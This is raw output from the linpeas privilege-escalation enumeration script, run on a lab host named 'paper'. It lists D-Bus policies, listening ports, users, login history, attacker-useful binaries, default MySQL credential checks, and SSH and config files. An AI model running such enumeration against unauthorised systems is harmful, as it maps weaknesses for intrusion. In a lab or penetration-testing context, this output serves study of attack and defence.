╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/avahi-dbus.conf (  <policy user="avahi">)
Possible weak user policy found on /etc/dbus-1/system.d/avahi-dbus.conf (  <policy group="avahi">)
Possible weak user policy found on /etc/dbus-1/system.d/gdm.conf (  <policy user="gdm">)
Possible weak user policy found on /etc/dbus-1/system.d/net.hadess.SensorProxy.conf (  <policy user="geoclue">)
Possible weak user policy found on /etc/dbus-1/system.d/org.fedoraproject.Setroubleshootd.conf (	<policy user="setroubleshoot">)
Possible weak user policy found on /etc/dbus-1/system.d/org.fedoraproject.SetroubleshootPrivileged.conf (  <policy user="setroubleshoot">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.GeoClue2.Agent.conf (  <policy user="geoclue">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.GeoClue2.conf (  <policy user="geoclue">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.PolicyKit1.conf (  <policy user="polkitd">
  <policy user="polkitd">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.RealtimeKit1.conf (  <policy user="rtkit">)
Possible weak user policy found on /etc/dbus-1/system.d/pulseaudio-system.conf (  <policy user="pulse">)

╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME                                              PID PROCESS         USER             CONNECTION    UNIT                      SESSION    DESCRIPTION
:1.11                                            1038 systemd-machine root             :1.11         systemd-machined.service  -          -
:1.12                                            1066 NetworkManager  root             :1.12         NetworkManager.service    -          -
:1.1464                                         90286 busctl          dwight           :1.1464       session-119.scope         119        -
:1.2                                             1041 rtkit-daemon    root             :1.2          rtkit-daemon.service      -          -
:1.25                                            1066 NetworkManager  root             :1.25         NetworkManager.service    -          -
:1.28                                            1205 systemd-logind  root             :1.28         systemd-logind.service    -          -
:1.3                                             1025 udisksd         root             :1.3          udisks2.service           -          -
:1.325                                          27164 packagekitd     root             :1.325        packagekit.service        -          -
:1.41                                            1356 systemd         dwight           :1.41         user@1004.service         -          -
:1.5                                                1 systemd         root             :1.5          init.scope                -          -
:1.6                                             1030 avahi-daemon    avahi            :1.6          avahi-daemon.service      -          -
:1.69                                            1125 tuned           root             :1.69         tuned.service             -          -
:1.735                                          81245 accounts-daemon root             :1.735        accounts-daemon.service   -          -
:1.79                                            1791 pulseaudio      dwight           :1.79         user@1004.service         -          -
:1.8                                             1044 polkitd         polkitd          :1.8          polkit.service            -          -
:1.9                                             1051 ModemManager    root             :1.9          ModemManager.service      -          -
com.redhat.Blivet0                                  - -               -                (activatable) -                         -
com.redhat.ifcfgrh1                              1066 NetworkManager  root             :1.25         NetworkManager.service    -          -
com.redhat.tuned                                 1125 tuned           root             :1.69         tuned.service             -          -
fi.w1.wpa_supplicant1                               - -               -                (activatable) -                         -
net.reactivated.Fprint                              - -               -                (activatable) -                         -
org.bluez                                           - -               -                (activatable) -                         -
org.fedoraproject.SetroubleshootFixit               - -               -                (activatable) -                         -
org.fedoraproject.SetroubleshootPrivileged          - -               -                (activatable) -                         -
org.fedoraproject.Setroubleshootd                   - -               -                (activatable) -                         -
org.freedesktop.Accounts                        81245 accounts-daemon root             :1.735        accounts-daemon.service   -          -
org.freedesktop.Avahi                            1030 avahi-daemon    avahi            :1.6          avahi-daemon.service      -          -
org.freedesktop.ColorManager                        - -               -                (activatable) -                         -
org.freedesktop.DBus                                1 systemd         root             -             init.scope                -          -
org.freedesktop.Flatpak.SystemHelper                - -               -                (activatable) -                         -
org.freedesktop.GeoClue2                            - -               -                (activatable) -                         -
org.freedesktop.ModemManager1                    1051 ModemManager    root             :1.9          ModemManager.service      -          -
org.freedesktop.NetworkManager                   1066 NetworkManager  root             :1.12         NetworkManager.service    -          -
org.freedesktop.PackageKit                      27164 packagekitd     root             :1.325        packagekit.service        -          -
org.freedesktop.PolicyKit1                       1044 polkitd         polkitd          :1.8          polkit.service            -          -
org.freedesktop.RealtimeKit1                     1041 rtkit-daemon    root             :1.2          rtkit-daemon.service      -          -
org.freedesktop.UDisks2                          1025 udisksd         root             :1.3          udisks2.service           -          -
org.freedesktop.UPower                              - -               -                (activatable) -                         -
org.freedesktop.bolt                                - -               -                (activatable) -                         -
org.freedesktop.fwupd                               - -               -                (activatable) -                         -
org.freedesktop.hostname1                           - -               -                (activatable) -                         -
org.freedesktop.import1                             - -               -                (activatable) -                         -
org.freedesktop.locale1                             - -               -                (activatable) -                         -
org.freedesktop.login1                           1205 systemd-logind  root             :1.28         systemd-logind.service    -          -
org.freedesktop.machine1                         1038 systemd-machine root             :1.11         systemd-machined.service  -          -
org.freedesktop.nm_dispatcher                       - -               -                (activatable) -                         -
org.freedesktop.portable1                           - -               -                (activatable) -                         -
org.freedesktop.realmd                              - -               -                (activatable) -                         -
org.freedesktop.resolve1                            - -               -                (activatable) -                         -
org.freedesktop.systemd1                            1 systemd         root             :1.5          init.scope                -          -
org.freedesktop.timedate1                           - -               -                (activatable) -                         -
org.gnome.GConf.Defaults                            - -               -                (activatable) -                         -
org.opensuse.CupsPkHelper.Mechanism                 - -               -                (activatable) -                         -


                                        ╔═════════════════════╗
════════════════════════════════════════╣ Network Information ╠════════════════════════════════════════
                                        ╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
paper
127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4
::1         localhost localhost.localdomain localhost6 localhost6.localdomain6
127.0.0.1 paper office.paper chat.office.paper
nameserver 192.168.122.1
nameserver 1.1.1.1
nameserver 1.0.0.1

╔══════════╣ Interfaces
default 0.0.0.0
loopback 127.0.0.0
link-local 169.254.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.143  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:feb9:e445  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:e4:45  txqueuelen 1000  (Ethernet)
        RX packets 941993  bytes 87796697 (83.7 MiB)
        RX errors 0  dropped 159  overruns 0  frame 0
        TX packets 955609  bytes 1655323736 (1.5 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 230582  bytes 81323158 (77.5 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 230582  bytes 81323158 (77.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

virbr0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 192.168.122.1  netmask 255.255.255.0  broadcast 192.168.122.255
        ether 52:54:00:9b:e7:f7  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:27017         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 192.168.122.1:53        0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:48320         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      2494/node           
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::443                  :::*                    LISTEN      -                   

╔══════════╣ Can I sniff with tcpdump?
No



                                         ╔═══════════════════╗
═════════════════════════════════════════╣ Users Information ╠═════════════════════════════════════════
                                         ╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=1004(dwight) gid=1004(dwight) groups=1004(dwight)

╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid

╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is enabled (1)
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it

╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash

╔══════════╣ Users with console
dwight:x:1004:1004::/home/dwight:/bin/bash
rocketchat:x:1001:1001::/home/rocketchat:/bin/bash
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(bin) gid=1(bin) groups=1(bin)
uid=1001(rocketchat) gid=1001(rocketchat) groups=1001(rocketchat)
uid=1004(dwight) gid=1004(dwight) groups=1004(dwight)
uid=107(qemu) gid=107(qemu) groups=107(qemu),36(kvm)
uid=11(operator) gid=0(root) groups=0(root)
uid=113(usbmuxd) gid=113(usbmuxd) groups=113(usbmuxd)
uid=12(games) gid=100(users) groups=100(users)
uid=14(ftp) gid=50(ftp) groups=50(ftp)
uid=171(pulse) gid=171(pulse) groups=171(pulse)
uid=172(rtkit) gid=172(rtkit) groups=172(rtkit)
uid=193(systemd-resolve) gid=193(systemd-resolve) groups=193(systemd-resolve)
uid=2(daemon) gid=2(daemon) groups=2(daemon)
uid=27(mysql) gid=27(mysql) groups=27(mysql)
uid=29(rpcuser) gid=29(rpcuser) groups=29(rpcuser)
uid=3(adm) gid=4(adm) groups=4(adm)
uid=32(rpc) gid=32(rpc) groups=32(rpc)
uid=4(lp) gid=7(lp) groups=7(lp)
uid=42(gdm) gid=42(gdm) groups=42(gdm)
uid=48(apache) gid=48(apache) groups=48(apache)
uid=5(sync) gid=0(root) groups=0(root)
uid=59(tss) gid=59(tss) groups=59(tss)
uid=6(shutdown) gid=0(root) groups=0(root)
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
uid=66(pegasus) gid=65(pegasus) groups=65(pegasus)
uid=7(halt) gid=0(root) groups=0(root)
uid=70(avahi) gid=70(avahi) groups=70(avahi)
uid=72(tcpdump) gid=72(tcpdump) groups=72(tcpdump)
uid=74(sshd) gid=74(sshd) groups=74(sshd)
uid=75(radvd) gid=75(radvd) groups=75(radvd)
uid=8(mail) gid=12(mail) groups=12(mail)
uid=81(dbus) gid=81(dbus) groups=81(dbus)
uid=976(mongod) gid=974(mongod) groups=974(mongod)
uid=977(nginx) gid=975(nginx) groups=975(nginx)
uid=978(insights) gid=976(insights) groups=976(insights)
uid=979(gnome-initial-setup) gid=977(gnome-initial-setup) groups=977(gnome-initial-setup)
uid=980(pipewire) gid=978(pipewire) groups=978(pipewire)
uid=981(setroubleshoot) gid=979(setroubleshoot) groups=979(setroubleshoot)
uid=982(colord) gid=980(colord) groups=980(colord)
uid=983(sssd) gid=981(sssd) groups=981(sssd)
uid=984(clevis) gid=983(clevis) groups=983(clevis),59(tss)
uid=985(dnsmasq) gid=985(dnsmasq) groups=985(dnsmasq)
uid=991(saslauth) gid=76(saslauth) groups=76(saslauth)
uid=992(libstoragemgmt) gid=986(libstoragemgmt) groups=986(libstoragemgmt)
uid=993(chrony) gid=987(chrony) groups=987(chrony)
uid=994(gluster) gid=989(gluster) groups=989(gluster)
uid=995(unbound) gid=990(unbound) groups=990(unbound)
uid=996(cockpit-ws) gid=993(cockpit-ws) groups=993(cockpit-ws)
uid=997(geoclue) gid=994(geoclue) groups=994(geoclue)
uid=998(polkitd) gid=996(polkitd) groups=996(polkitd)
uid=999(systemd-coredump) gid=997(systemd-coredump) groups=997(systemd-coredump)

╔══════════╣ Login now
 13:58:51 up  1:45,  2 users,  load average: 0.77, 0.50, 0.37
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
dwight   pts/1    10.10.14.132     13:53    1:47   0.43s  0.00s /bin/sh ./linpeas.sh -N
dwight   pts/2    10.10.14.101     12:39    1:18m  0.05s  0.05s -bash

╔══════════╣ Last logons
root     pts/1        Sat Jul  3 05:02:12 2021 - Sat Jul  3 05:04:14 2021  (00:02)     192.168.1.6
root     pts/1        Sat Jul  3 05:01:22 2021 - Sat Jul  3 05:02:10 2021  (00:00)     192.168.1.6
root     pts/1        Sat Jul  3 05:01:10 2021 - Sat Jul  3 05:01:21 2021  (00:00)     192.168.1.6
root     pts/1        Sat Jul  3 04:59:39 2021 - Sat Jul  3 05:01:09 2021  (00:01)     192.168.1.6
root     pts/1        Sat Jul  3 04:59:12 2021 - Sat Jul  3 04:59:37 2021  (00:00)     192.168.1.6
root     pts/1        Sat Jul  3 04:49:57 2021 - Sat Jul  3 04:59:04 2021  (00:09)     192.168.1.6
nick     tty2         Sat Jul  3 10:14:32 2021 - down                      (-5:05)     0.0.0.0
reboot   system boot  Sat Jul  3 10:13:30 2021 - Sat Jul  3 05:08:39 2021  (-5:04)     0.0.0.0

wtmp begins Sat Jul  3 10:13:30 2021

╔══════════╣ Last time logon each user
Username         Port     From             Latest
root             pts/0                     Sun May 29 13:54:34 -0400 2022
gdm              tty1                      Sat Jul  3 07:43:35 -0400 2021
dwight           pts/1    10.10.14.132     Sun May 29 13:53:35 -0400 2022

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)

╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!



                                       ╔══════════════════════╗
═══════════════════════════════════════╣ Software Information ╠═══════════════════════════════════════
                                       ╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/ncat
/usr/bin/perl
/usr/bin/ping
/usr/bin/podman
/usr/bin/python3
/usr/bin/python3.6
/usr/bin/runc
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers
gcc.x86_64                         8.5.0-4.el8_5                      @AppStream
gcc-c++.x86_64                     8.5.0-4.el8_5                      @AppStream
/usr/bin/gcc
/usr/bin/g++

╔══════════╣ MySQL
mysql  Ver 8.0.26 for Linux on x86_64 (Source distribution)

═╣ MySQL connection using default root/root ........... No
═╣ MySQL connection using root/toor ................... No
═╣ MySQL connection using root/NOPASS ................. No

╔══════════╣ Searching mysql credentials and exec

╔══════════╣ Analyzing Mongo Files (limit 70)
Version: MongoDB shell version v4.0.27
git version: d47b151b55f286546e7c7c98888ae0577856ca20
OpenSSL version: OpenSSL 1.0.1e-fips 11 Feb 2013
allocator: tcmalloc
modules: none
build environment:
    distmod: rhel70
    distarch: x86_64
    target_arch: x86_64
db version v4.0.27
git version: d47b151b55f286546e7c7c98888ae0577856ca20
OpenSSL version: OpenSSL 1.0.1e-fips 11 Feb 2013
allocator: tcmalloc
modules: none
build environment:
    distmod: rhel70
    distarch: x86_64
    target_arch: x86_64
Possible mongo anonymous authentication
-rw-r--r--. 1 root root 896 Feb  1 09:25 /etc/mongod.conf
systemLog:
  destination: file
  logAppend: true
  path: /var/log/mongodb/mongod.log
storage:
  dbPath: /var/lib/mongo
  journal:
    enabled: true
  engine: wiredTiger
processManagement:
  timeZoneInfo: /usr/share/zoneinfo
net:
  port: 27017
security:
  authorization: "enabled"
replication:
  replSetName: rs01

╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: apache2 Not Found
Server version: Apache/2.4.37 (centos)
Server built:   Nov 12 2021 04:57:27
Nginx version: nginx Not Found
══╣ PHP exec extensions

-rw-r--r--. 1 root root 1434 Jul  3  2021 /etc/httpd/conf.d/000-default.conf
<VirtualHost *:80>
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html
	ErrorLog /var/log/error.log
	CustomLog /var/log/access.log combined
	LoadModule headers_module /usr/lib/apache2/modules/mod_headers.so
	Header always set X-Backend-Server "office.paper"
	
</VirtualHost>

-rw-r--r--. 1 root root 62221 May  6  2020 /etc/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On

╔══════════╣ Analyzing Http conf Files (limit 70)
-rw-r--r--. 1 root root 11927 Jul  3  2021 /etc/httpd/conf/httpd.conf
-rw-r--r-- 1 root root 77 Nov 11  2021 /usr/lib/tmpfiles.d/httpd.conf

╔══════════╣ Analyzing Wifi Connections Files (limit 70)
drwxr-xr-x. 2 root root 6 Nov  9  2021 /etc/NetworkManager/system-connections
drwxr-xr-x. 2 root root 6 Nov  9  2021 /etc/NetworkManager/system-connections


╔══════════╣ Analyzing VNC Files (limit 70)




-rw-r--r-- 1 root root 475 Aug  9  2021 /usr/lib/firewalld/services/vnc-server.xml
<?xml version="1.0" encoding="utf-8"?>
<service>
  <short>Virtual Network Computing Server (VNC)</short>
  <description>A VNC server provides an external accessible X session. Enable this option if you plan to provide a VNC server with direct access. The access will be possible for displays :0 to :3. If you plan to provide access with SSH, do not open this option and use the via option of the VNC viewer.</description>
  <port protocol="tcp" port="5900-5903"/>
</service>

╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)




-rw-r--r-- 1 dwight dwight 725 May 29 13:53 /home/dwight/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCyGa8SmF8nYURnPVZ2CbDZXTntkJLnZRQenOONQQRXnOj0Nq1z5Kxq5OAuKJz6CXsNwjxOMMlwV7DOSfXy74aCIm6KOuFvUUw6DND0dAdg0PnqC3icTP4uPoshYLxFfhDmWDCVoy9Be1xp90pIlJVYg8An+REFoTHEVTmYgIhQdKVPJg9SicNvbEtIWEubsPIu5EQdRGq09rWxTWAvWXN11xEnTa2EwId+OzPUC2/JUww8nvaluLHJEd3aY9l63Ql4HfWriZheQdvZRWLDr8yPPE4RHp8WnCzdWXBleh4HF7R1NaznSycing6KRvl+Vq6mBNfovSK1d6zoifBnccYxqbp85aSo1lftwrUz99xAnZh3yb/0hC98T7x1kKCVjkLjKVqqiPgfjhR6hG/A5uwGkJozXBEJcqK3D+5D0/IMFscPBiT2XGHLhoSiITXjY6Mig2Ez/IEhW4tFN8PA37y3JYQhDMNFYYg7vQcTMiZVQSe0ej8J/K54OO5+9RQLMXs= kali@kali
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDjmclqrLGY6+RTPWcGyJI61rymvp8jkbVpiiCc/GN5C
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDjmclqrLGY6+RTPWcGyJI61rymvp8jkbVpiiCc/GN5C

══╣ Some certificates were found (out limited):
/etc/pki/ca-trust/extracted/pem/objsign-ca-bundle.pem
/etc/pki/ca-trust/source/ca-bundle.legacy.crt
/etc/pki/fwupd-metadata/LVFS-CA.pem
/etc/pki/fwupd/LVFS-CA.pem
/etc/pki/tls/certs/localhost.crt
/opt/Rocket.Chat/programs/server/node_modules/node-gyp/test/fixtures/ca-bundle.crt
/opt/Rocket.Chat/programs/server/node_modules/node-gyp/test/fixtures/ca.crt
/opt/Rocket.Chat/programs/server/node_modules/node-gyp/test/fixtures/server.crt
/opt/Rocket.Chat/programs/server/npm/node_modules/@google-cloud/common/node_modules/agent-base/test/ssl-cert-snakeoil.pem
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/credentials/support/cert.pem
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/credentials/support/certIssuerKey.pem
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/credentials/support/certKey.pem
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/credentials/support/certKeyProduction.pem
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/credentials/support/certProduction.pem
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/credentials/support/key.pem
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/credentials/support/keyEncrypted.pem
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/credentials/support/keyIssuer.pem
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/credentials/support/keyPKCS8.pem
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/credentials/support/keyPKCS8Encrypted.pem
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/credentials/support/keyProduction.pem
83330PSTORAGE_CERTSBIN

══╣ Some client certificates were found:
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/credentials/support/certIssuerKey.p12
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/credentials/support/certIssuerKeyOpenSSL.p12
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/credentials/support/certIssuerKeyPassphrase.p12
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/credentials/support/multipleKeys.p12
/opt/Rocket.Chat/programs/server/npm/node_modules/apn/test/support/initializeTest.pfx
/opt/Rocket.Chat/programs/server/npm/node_modules/xml-encryption/test/test-auth0.pfx
/opt/Rocket.Chat/programs/server/npm/node_modules/xml-encryption/test/test-cbc128.pfx


Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf

╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x. 2 root root 4096 Jan 14 05:01 /etc/pam.d
-rw-r--r--. 1 root root 727 Jul 13  2021 /etc/pam.d/sshd
auth       substack     password-auth
auth       include      postlogin
account    include      password-auth
password   include      password-auth
session    include      password-auth


╔══════════╣ Analyzing NFS Exports Files (limit 70)
-rw-r--r--. 1 root root 0 Sep 10  2018 /etc/exports

╔══════════╣ Searching kerberos conf files and tickets
╚ http://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory
ptrace protection is enabled (1), you need to disable it to search for tickets inside processes memory
-rw-r--r--. 1 root root 812 Aug 26  2021 /etc/krb5.conf
# To opt out of the system crypto-policies configuration of krb5, remove the
# symlink at /etc/krb5.conf.d/crypto-policies which will not be recreated.
includedir /etc/krb5.conf.d/

[logging]
    default = FILE:/var/log/krb5libs.log
    kdc = FILE:/var/log/krb5kdc.log
    admin_server = FILE:/var/log/kadmind.log

[libdefaults]
    dns_lookup_realm = false
    ticket_lifetime = 24h
    renew_lifetime = 7d
    forwardable = true
    rdns = false
    pkinit_anchors = FILE:/etc/pki/tls/certs/ca-bundle.crt
    spake_preauth_groups = edwards25519
#    default_realm = EXAMPLE.COM
    default_ccache_name = KEYRING:persistent:%{uid}

[realms]
# EXAMPLE.COM = {
#     kdc = kerberos.example.com
#     admin_server = kerberos.example.com
# }

[domain_realm]
# .example.com = EXAMPLE.COM
# example.com = EXAMPLE.COM
-rw-r--r--. 1 root root 189 Dec 21 15:14 /usr/lib64/sssd/conf/sssd.conf
[sssd]
services = nss, pam
domains = shadowutils

[nss]

[pam]

[domain/shadowutils]
id_provider = files

auth_provider = proxy
proxy_pam_target = sssd-shadowutils

proxy_fast_alias = True
tickets kerberos Not Found
klist Not Found



╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions
tmux 2.7


/tmp/tmux-1004
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /tmp/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /var/lib/sss/mc/passwd

╔══════════╣ Analyzing Github Files (limit 70)
drwxrwxr-x 2 dwight dwight 23 Jul  3  2021 /home/dwight/hubot/node_modules/hubot/.github
drwx--x--x 2 dwight dwight 23 Jul  3  2021 /home/dwight/hubot/node_modules_bak/hubot/.github
drwx--x--x 2 dwight dwight 23 Jul  3  2021 /home/dwight/hubot/node_modules_bak/node_modules.bak/hubot/.github
drwxr-xr-x 2 rocketchat rocketchat 25 Jul  3  2021 /opt/Rocket.Chat/programs/server/node_modules/aws4/.github
drwxr-xr-x 2 rocketchat rocketchat 25 Jul  3  2021 /opt/Rocket.Chat/programs/server/node_modules/balanced-match/.github
drwxr-xr-x 2 rocketchat rocketchat 25 Jul  3  2021 /opt/Rocket.Chat/programs/server/node_modules/fast-json-stable-stringify/.github
drwxr-xr-x 3 rocketchat rocketchat 23 Jul  3  2021 /opt/Rocket.Chat/programs/server/node_modules/needle/.github
drwxr-xr-x 2 rocketchat rocketchat 63 Jul  3  2021 /opt/Rocket.Chat/programs/server/node_modules/node-gyp/.github
drwxr-xr-x 2 rocketchat rocketchat 26 Jul  3  2021 /opt/Rocket.Chat/programs/server/node_modules/npm-normalize-package-bin/.github
drwxr-xr-x 3 rocketchat rocketchat 42 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/array-includes/.github
drwxr-xr-x 3 rocketchat rocketchat 42 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/array-includes/node_modules/es-abstract/.github
drwxr-xr-x 2 rocketchat rocketchat 25 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/array-includes/node_modules/es-to-primitive/.github
drwxr-xr-x 3 rocketchat rocketchat 42 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/array-includes/node_modules/has-symbols/.github
drwxr-xr-x 3 rocketchat rocketchat 63 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/array-includes/node_modules/is-callable/.github
drwxr-xr-x 3 rocketchat rocketchat 23 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/array-includes/node_modules/is-regex/.github
drwxr-xr-x 3 rocketchat rocketchat 42 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/array.prototype.flat/.github
drwxr-xr-x 3 rocketchat rocketchat 42 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/array.prototype.flat/node_modules/es-abstract/.github
drwxr-xr-x 2 rocketchat rocketchat 25 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/array.prototype.flat/node_modules/es-to-primitive/.github
drwxr-xr-x 3 rocketchat rocketchat 42 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/array.prototype.flat/node_modules/has-symbols/.github
drwxr-xr-x 3 rocketchat rocketchat 63 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/array.prototype.flat/node_modules/is-callable/.github
drwxr-xr-x 3 rocketchat rocketchat 23 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/array.prototype.flat/node_modules/is-regex/.github
drwxr-xr-x 2 rocketchat rocketchat 38 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/bugsnag/.github
drwxr-xr-x 2 rocketchat rocketchat 48 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/clipboard/.github
drwxr-xr-x 3 rocketchat rocketchat 28 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/csv-parse/lib/.github
drwxr-xr-x 2 rocketchat rocketchat 25 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/flatted/.github
drwxr-xr-x 3 rocketchat rocketchat 28 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/focus-within-polyfill/.github
drwxr-xr-x 2 rocketchat rocketchat 117 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/googleapis/.github
drwxr-xr-x 3 rocketchat rocketchat 42 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/is-string/.github
drwxr-xr-x 2 rocketchat rocketchat 25 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/is-what/.github
drwxr-xr-x 2 rocketchat rocketchat 25 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/libmime/.github
drwxr-xr-x 2 rocketchat rocketchat 28 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/libmime/node_modules/iconv-lite/.github
drwxr-xr-x 2 rocketchat rocketchat 25 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/mailparser/.github
drwxr-xr-x 2 rocketchat rocketchat 28 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/mailparser/node_modules/iconv-lite/.github
drwxr-xr-x 2 rocketchat rocketchat 25 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/merge-anything/.github
drwxr-xr-x 2 rocketchat rocketchat 74 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/meteor/babel-compiler/node_modules/call-bind/.github
drwxr-xr-x 2 rocketchat rocketchat 74 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/meteor/babel-compiler/node_modules/get-intrinsic/.github
drwxr-xr-x 3 rocketchat rocketchat 42 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/meteor/babel-compiler/node_modules/has-symbols/.github
drwxr-xr-x 3 rocketchat rocketchat 42 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/meteor/babel-compiler/node_modules/object.assign/.github
drwxr-xr-x 2 rocketchat rocketchat 25 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/meteor/logging/node_modules/cli-color/.github
drwxr-xr-x 2 rocketchat rocketchat 25 Jul  1  2021 /opt/Rocket.Chat/programs/server/npm/node_modules/meteor/logging/node_modules/d/.github
